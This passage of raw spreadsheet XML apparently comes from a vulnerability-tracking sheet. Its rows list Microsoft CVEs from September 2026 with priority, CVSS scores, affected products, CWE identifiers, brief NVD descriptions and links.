/><c r="K139" s="5" t="inlineStr" /><c r="L139" s="5" t="inlineStr" /><c r="M139" s="5" t="inlineStr" /><c r="N139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O139" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P139" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q139" s="5" t="inlineStr" /><c r="R139" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S139" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t></is></c></row><row r="140"><c r="A140" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B140" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C140" s="5" t="inlineStr"><is><t>CVE-2026-69355</t></is></c><c r="D140" s="5" t="n"><v>8.800000000000001</v></c><c r="E140" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F140" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G140" s="5" t="inlineStr" /><c r="H140" s="5" t="n"><v>0.008</v></c><c r="I140" s="5" t="inlineStr" /><c r="J140" s="5" t="inlineStr" /><c r="K140" s="5" t="inlineStr" /><c r="L140" s="5" t="inlineStr" /><c r="M140" s="5" t="inlineStr" /><c r="N140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O140" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P140" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q140" s="5" t="inlineStr" /><c r="R140" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S140" s="5" t="inlineStr"><is><t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t></is></c></row><row r="141"><c r="A141" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B141" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C141" s="5" t="inlineStr"><is><t>CVE-2026-69360</t></is></c><c r="D141" s="5" t="n"><v>8.800000000000001</v></c><c r="E141" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F141" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G141" s="5" t="inlineStr" /><c r="H141" s="5" t="n"><v>0.008</v></c><c r="I141" s="5" t="inlineStr" /><c r="J141" s="5" t="inlineStr" /><c r="K141" s="5" t="inlineStr" /><c r="L141" s="5" t="inlineStr" /><c r="M141" s="5" t="inlineStr" /><c r="N141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O141" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P141" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q141" s="5" t="inlineStr" /><c r="R141" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S141" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t></is></c></row><row r="142"><c r="A142" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B142" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C142" s="5" t="inlineStr"><is><t>CVE-2026-69386</t></is></c><c r="D142" s="5" t="n"><v>8.800000000000001</v></c><c r="E142" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F142" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G142" s="5" t="inlineStr" /><c r="H142" s="5" t="n"><v>0.008</v></c><c r="I142" s="5" t="inlineStr" /><c r="J142" s="5" t="inlineStr" /><c r="K142" s="5" t="inlineStr" /><c r="L142" s="5" t="inlineStr" /><c r="M142" s="5" t="inlineStr" /><c r="N142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P142" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q142" s="5" t="inlineStr" /><c r="R142" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S142" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T142" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t></is></c></row><row r="143"><c r="A143" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B143" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C143" s="5" t="inlineStr"><is><t>CVE-2026-69434</t></is></c><c r="D143" s="5" t="n"><v>8.800000000000001</v></c><c r="E143" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F143" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G143" s="5" t="inlineStr" /><c r="H143" s="5" t="n"><v>0.008</v></c><c r="I143" s="5" t="inlineStr" /><c r="J143" s="5" t="inlineStr" /><c r="K143" s="5" t="inlineStr" /><c r="L143" s="5" t="inlineStr" /><c r="M143" s="5" t="inlineStr" /><c r="N143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O143" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P143" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q143" s="5" t="inlineStr" /><c r="R143" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S143" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t></is></c></row><row r="144"><c r="A144" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B144" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C144" s="5" t="inlineStr"><is><t>CVE-2026-69439</t></is></c><c r="D144" s="5" t="n"><v>8.800000000000001</v></c><c r="E144" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F144" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G144" s="5" t="inlineStr" /><c r="H144" s="5" t="n"><v>0.007</v></c><c r="I144" s="5" t="inlineStr" /><c r="J144" s="5" t="inlineStr" /><c r="K144" s="5" t="inlineStr" /><c r="L144" s="5" t="inlineStr" /><c r="M144" s="5" t="inlineStr" /><c r="N144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O144" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P144" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q144" s="5" t="inlineStr" /><c r="R144" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S144" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t></is></c></row><row r="145"><c r="A145" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B145" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C145" s="5" t="inlineStr"><is><t>CVE-2026-69442</t></is></c><c r="D145" s="5" t="n"><v>8.800000000000001</v></c><c r="E145" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F145" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G145" s="5" t="inlineStr" /><c r="H145" s="5" t="n"><v>0.008</v></c><c r="I145" s="5" t="inlineStr" /><c r="J145" s="5" t="inlineStr" /><c r="K145" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L145" s="5" t="inlineStr" /><c r="M145" s="5" t="inlineStr" /><c r="N145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O145" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P145" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q145" s="5" t="inlineStr" /><c r="R145" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S145" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t></is></c></row><row r="146"><c r="A146" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B146" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C146" s="5" t="inlineStr"><is><t>CVE-2026-69461</t></is></c><c r="D146" s="5" t="n"><v>8.800000000000001</v></c><c r="E146" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F146" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G146" s="5" t="inlineStr" /><c r="H146" s="5" t="n"><v>0.008</v></c><c r="I146" s="5" t="inlineStr" /><c r="J146" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1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6" s="5" t="inlineStr" /><c r="M146" s="5" t="inlineStr" /><c r="N146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O146" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P146" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q146" s="5" t="inlineStr" /><c r="R146" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S146" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t></is></c></row><row r="147"><c r="A147" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B147" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C147" s="5" t="inlineStr"><is><t>CVE-2026-69464</t></is></c><c r="D147" s="5" t="n"><v>8.800000000000001</v></c><c r="E147" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F147" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G147" s="5" t="inlineStr" /><c r="H147" s="5" t="n"><v>0.008999999999999999</v></c><c r="I147" s="5" t="inlineStr" /><c r="J147" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K147" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L147" s="5" t="inlineStr" /><c r="M147" s="5" t="inlineStr" /><c r="N147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P147" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q147" s="5" t="inlineStr" /><c r="R147" s="5" t="inlineStr"><is><t>CWE-250</t></is></c><c r="S147" s="5" t="inlineStr"><is><t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t></is></c></row><row r="148"><c r="A148" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C148" s="5" t="inlineStr"><is><t>CVE-2026-69465</t></is></c><c r="D148" s="5" t="n"><v>8.800000000000001</v></c><c r="E148" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F148" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G148" s="5" t="inlineStr" /><c r="H148" s="5" t="n"><v>0.008</v></c><c r="I148" s="5" t="inlineStr" /><c r="J148" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K148" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L148" s="5" t="inlineStr" /><c r="M148" s="5" t="inlineStr" /><c r="N148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P148" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q148" s="5" t="inlineStr" /><c r="R148" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S148" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t></is></c></row><row r="149"><c r="A149" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C149" s="5" t="inlineStr"><is><t>CVE-2026-69485</t></is></c><c r="D149" s="5" t="n"><v>8.800000000000001</v></c><c r="E149" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F149" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G149" s="5" t="inlineStr" /><c r="H149" s="5" t="n"><v>0.008999999999999999</v></c><c r="I149" s="5" t="inlineStr" /><c r="J149" s="5" t="inlineStr" /><c r="K149" s="5" t="inlineStr" /><c r="L149" s="5" t="inlineStr" /><c r="M149" s="5" t="inlineStr" /><c r="N149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P149" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q149" s="5" t="inlineStr" /><c r="R149" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S149" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t></is></c><c r="T149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69485</t></is></c></row><row r="150"><c r="A150" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B150" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C150" s="5" t="inlineStr"><is><t>CVE-2026-69494</t></is></c><c r="D150" s="5" t="n"><v>8.800000000000001</v></c><c r="E150" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F150" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G150" s="5" t="inlineStr" /><c r="H150" s="5" t="n"><v>0.008</v></c><c r="I150" s="5" t="inlineStr" /><c r="J150" s="5" t="inlineStr" /><c r="K150" s="5" t="inlineStr" /><c r="L150" s="5" t="inlineStr" /><c r="M150" s="5" t="inlineStr" /><c r="N150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O150" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P150" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q150" s="5" t="inlineStr" /><c r="R150" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S150" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t></is></c></row><row r="151"><c r="A151" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B151" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C151" s="5" t="inlineStr"><is><t>CVE-2026-69495</t></is></c><c r="D151" s="5" t="n"><v>8.800000000000001</v></c><c r="E151" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F151" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G151" s="5" t="inlineStr" /><c r="H151" s="5" t="n"><v>0.008</v></c><c r="I151" s="5" t="inlineStr" /><c r="J151" s="5" t="inlineStr" /><c r="K151" s="5" t="inlineStr" /><c r="L151" s="5" t="inlineStr" /><c r="M151" s="5" t="inlineStr" /><c r="N151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O151" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P151" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q151" s="5" t="inlineStr" /><c r="R151" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S151" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t></is></c></row><row r="152"><c r="A152" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C152" s="5" t="inlineStr"><is><t>CVE-2026-69499</t></is></c><c r="D152" s="5" t="n"><v>8.800000000000001</v></c><c r="E152" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F152" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G152" s="5" t="inlineStr" /><c r="H152" s="5" t="n"><v>0.008</v></c><c r="I152" s="5" t="inlineStr" /><c r="J152" s="5" t="inlineStr" /><c r="K152" s="5" t="inlineStr" /><c r="L152" s="5" t="inlineStr" /><c r="M152" s="5" t="inlineStr" /><c r="N152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P152" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q152" s="5" t="inlineStr" /><c r="R152" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S152" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t></is></c></row><row r="153"><c r="A153" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B153" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C153" s="5" t="inlineStr"><is><t>CVE-2026-69511</t></is></c><c r="D153" s="5" t="n"><v>8.800000000000001</v></c><c r="E153" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F153" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G153" s="5" t="inlineStr" /><c r="H153" s="5" t="n"><v>0.008</v></c><c r="I153" s="5" t="inlineStr" /><c r="J153" s="5" t="inlineStr" /><c r="K153" s="5" t="inlineStr" /><c r="L153" s="5" t="inlineStr" /><c r="M153" s="5" t="inlineStr" /><c r="N153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P153" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q153" s="5" t="inlineStr" /><c r="R153" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S153" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t></is></c></row><row r="154"><c r="A154" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B154" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C154" s="5" t="inlineStr"><is><t>CVE-2026-69518</t></is></c><c r="D154" s="5" t="n"><v>8.800000000000001</v></c><c r="E154" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F154" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G154" s="5" t="inlineStr" /><c r="H154" s="5" t="n"><v>0.008</v></c><c r="I154" s="5" t="inlineStr" /><c r="J154" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K15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4" s="5" t="inlineStr" /><c r="M154" s="5" t="inlineStr" /><c r="N154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O154" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P154" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q154" s="5" t="inlineStr" /><c r="R154" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S154" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t></is></c></row><row r="155"><c r="A155" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B155" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C155" s="5" t="inlineStr"><is><t>CVE-2026-69522</t></is></c><c r="D155" s="5" t="n"><v>8.800000000000001</v></c><c r="E155" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F155" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G155" s="5" t="inlineStr" /><c r="H155" s="5" t="n"><v>0.008</v></c><c r="I155" s="5" t="inlineStr" /><c r="J155" s="5" t="inlineStr" /><c r="K155" s="5" t="inlineStr" /><c r="L155" s="5" t="inlineStr" /><c r="M155" s="5" t="inlineStr" /><c r="N155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O155" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P155" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q155" s="5" t="inlineStr" /><c r="R155" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S155" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t></is></c></row><row r="156"><c r="A156" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B156" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C156" s="5" t="inlineStr"><is><t>CVE-2026-69529</t></is></c><c r="D156" s="5" t="n"><v>8.800000000000001</v></c><c r="E156" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F156" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G156" s="5" t="inlineStr" /><c r="H156" s="5" t="n"><v>0.005</v></c><c r="I156" s="5" t="inlineStr" /><c r="J156" s="5" t="inlineStr" /><c r="K156" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L156" s="5" t="inlineStr" /><c r="M156" s="5" t="inlineStr" /><c r="N156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O156" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P156" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q156" s="5" t="inlineStr" /><c r="R156" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S156" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t></is></c></row><row r="157"><c r="A157" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B157" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C157" s="5" t="inlineStr"><is><t>CVE-2026-69547</t></is></c><c r="D157" s="5" t="n"><v>8.800000000000001</v></c><c r="E157" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F157" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G157" s="5" t="inlineStr" /><c r="H157" s="5" t="n"><v>0.008999999999999999</v></c><c r="I157" s="5" t="inlineStr" /><c r="J157" s="5" t="inlineStr" /><c r="K157" s="5" t="inlineStr" /><c r="L157" s="5" t="inlineStr" /><c r="M157" s="5" t="inlineStr" /><c r="N157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P157" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q157" s="5" t="inlineStr" /><c r="R157" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S157" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t></is></c></row><row r="158"><c r="A158" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B158" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C158" s="5" t="inlineStr"><is><t>CVE-2026-69551</t></is></c><c r="D158" s="5" t="n"><v>8.800000000000001</v></c><c r="E158" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F158" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G158" s="5" t="inlineStr" /><c r="H158" s="5" t="n"><v>0.008999999999999999</v></c><c r="I158" s="5" t="inlineStr" /><c r="J158" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K158" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L158" s="5" t="inlineStr" /><c r="M158" s="5" t="inlineStr" /><c r="N158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O158" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P158" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q158" s="5" t="inlineStr" /><c r="R158" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S158" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t></is></c><c r="T158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t></is></c></row><row r="159"><c r="A159" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B159" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C159" s="5" t="inlineStr"><is><t>CVE-2026-69556</t></is></c><c r="D159" s="5" t="n"><v>8.800000000000001</v></c><c r="E159" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F159" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G159" s="5" t="inlineStr" /><c r="H159" s="5" t="n"><v>0.008</v></c><c r="I159" s="5" t="inlineStr" /><c r="J159" s="5" t="inlineStr" /><c r="K159" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L159" s="5" t="inlineStr" /><c r="M159" s="5" t="inlineStr" /><c r="N159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O159" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P159" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q159" s="5" t="inlineStr" /><c r="R159" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S159" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t></is></c></row><row r="160"><c r="A160" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C160" s="5" t="inlineStr"><is><t>CVE-2026-69598</t></is></c><c r="D160" s="5" t="n"><v>8.800000000000001</v></c><c r="E160" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F160" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G160" s="5" t="inlineStr" /><c r="H160" s="5" t="n"><v>0.008</v></c><c r="I160" s="5" t="inlineStr" /><c r="J160" s="5" t="inlineStr" /><c r="K160" s="5" t="inlineStr" /><c r="L160" s="5" t="inlineStr" /><c r="M160" s="5" t="inlineStr" /><c r="N160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P160" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q160" s="5" t="inlineStr" /><c r="R160" s="5" t="inlineStr"><is><t>CWE-131</t></is></c><c r="S160" s="5" t="inlineStr"><is><t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t></is></c></row><row r="161"><c r="A161" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B161" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C161" s="5" t="inlineStr"><is><t>CVE-2026-69601</t></is></c><c r="D161" s="5" t="n"><v>8.800000000000001</v></c><c r="E161" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F161" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G161" s="5" t="inlineStr" /><c r="H161" s="5" t="n"><v>0.008</v></c><c r="I161" s="5" t="inlineStr" /><c r="J161" s="5" t="inlineStr" /><c r="K161" s="5" t="inlineStr" /><c r="L161" s="5" t="inlineStr" /><c r="M161" s="5" t="inlineStr" /><c r="N161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O161" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P161" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q161" s="5" t="inlineStr" /><c r="R161" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S161" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a 